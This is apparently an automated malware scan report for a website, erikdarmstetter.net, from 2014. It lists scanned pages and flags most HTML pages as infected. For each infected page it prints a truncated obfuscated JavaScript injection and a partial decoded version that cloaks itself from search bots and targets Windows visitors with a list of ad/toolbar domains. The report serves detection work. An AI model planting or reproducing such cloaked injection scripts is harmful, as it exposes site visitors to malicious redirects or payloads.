Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=erikdarmstetter.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://erikdarmstetter.net/ | 200 OK Content-Length: 13834 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://erikdarmstetter.net/js/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://erikdarmstetter.net/js/jquery-latest.js | 200 OK Content-Length: 59291 Content-Type: application/x-javascript | clean |
http://erikdarmstetter.net/js/video.js | 200 OK Content-Length: 133 Content-Type: application/x-javascript | clean |
http://erikdarmstetter.net/wp-content/plugins/flash-video-player/swfobject.js | 200 OK Content-Length: 9759 Content-Type: application/x-javascript | clean |
http://w.sharethis.com/button/sharethis.js | 200 OK Content-Length: 87580 Content-Type: application/x-javascript | clean |
http://erikdarmstetter.net/js/jquery.newsticker.js | 200 OK Content-Length: 1936 Content-Type: application/x-javascript | clean |
http://erikdarmstetter.net/js/jquery.slideshow.min.js | 200 OK Content-Length: 1590 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://erikdarmstetter.net//static.woopra.com/js/woopra.v2.js/ | 404 Not Found Content-Length: 15167 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://erikdarmstetter.net/services | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 05:14:42 GMT Pragma: no-cache Location: http://erikdarmstetter.net/services/ Server: Apache/2.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-ihnbadbn=58FF1F4A27CD5F53733BF3A691BC2006; path=/ Set-Cookie: PHPSESSID=50ouv7lqqp55h641df5dl84ds2; path=/ X-Pingback: /xmlrpc.php | clean |
http://erikdarmstetter.net/services/ | 200 OK Content-Length: 10467 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://erikdarmstetter.net/speaking | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 05:14:43 GMT Pragma: no-cache Location: http://erikdarmstetter.net/speaking/ Server: Apache/2.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-ihnbadbn=4E47EB29930CB15E93A2FD42263B63F7; path=/ Set-Cookie: PHPSESSID=7pmkmnsohhe4n87ot2nbj2kia6; path=/ X-Pingback: /xmlrpc.php | clean |
http://erikdarmstetter.net/speaking/ | 200 OK Content-Length: 9417 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://erikdarmstetter.net/whyus | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 05:14:46 GMT Pragma: no-cache Location: http://erikdarmstetter.net/whyus/ Server: Apache/2.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-ihnbadbn=FA60E24699AE443C4BC22950C7B91B14; path=/ Set-Cookie: PHPSESSID=70mfcjkdc6tso8a3cj9aisbbv6; path=/ X-Pingback: /xmlrpc.php | clean |
http://erikdarmstetter.net/whyus/ | 200 OK Content-Length: 10002 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://erikdarmstetter.net/walloffame | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 05:14:48 GMT Pragma: no-cache Location: http://erikdarmstetter.net/walloffame/ Server: Apache/2.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-ihnbadbn=86D043B8B76644A174BF21F234BC99CF; path=/ Set-Cookie: PHPSESSID=oou91j0sk1jp0ata52lgnmv150; path=/ X-Pingback: /xmlrpc.php | clean |
http://erikdarmstetter.net/walloffame/ | 200 OK Content-Length: 13661 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://erikdarmstetter.net/blog | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 05:14:49 GMT Pragma: no-cache Location: http://erikdarmstetter.net/blog/ Server: Apache/2.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-ihnbadbn=00EF4280B9F743EB8D88D94D30140ED5; path=/ Set-Cookie: PHPSESSID=0okbg817562uboufnrjounfo27; path=/ X-Pingback: /xmlrpc.php | clean |
http://erikdarmstetter.net/blog/ | 200 OK Content-Length: 51968 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: erikdarmstetter.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 05:14:34 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-ihnbadbn=FA60E24699AE443C4BC22950C7B91B14; path=/
Set-Cookie: PHPSESSID=2csb121hgfou4fic0jg1sn7lc6; path=/
X-Pingback: /xmlrpc.php
GET / HTTP/1.1
Host: erikdarmstetter.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 05:14:34 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-ihnbadbn=FA60E24699AE443C4BC22950C7B91B14; path=/
Set-Cookie: PHPSESSID=2csb121hgfou4fic0jg1sn7lc6; path=/
X-Pingback: /xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: erikdarmstetter.net
Referer: http://www.google.com/search?q=erikdarmstetter.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: erikdarmstetter.net
Referer: http://www.google.com/search?q=erikdarmstetter.net
Result:
The result is similar to the first query. There are no suspicious redirects found.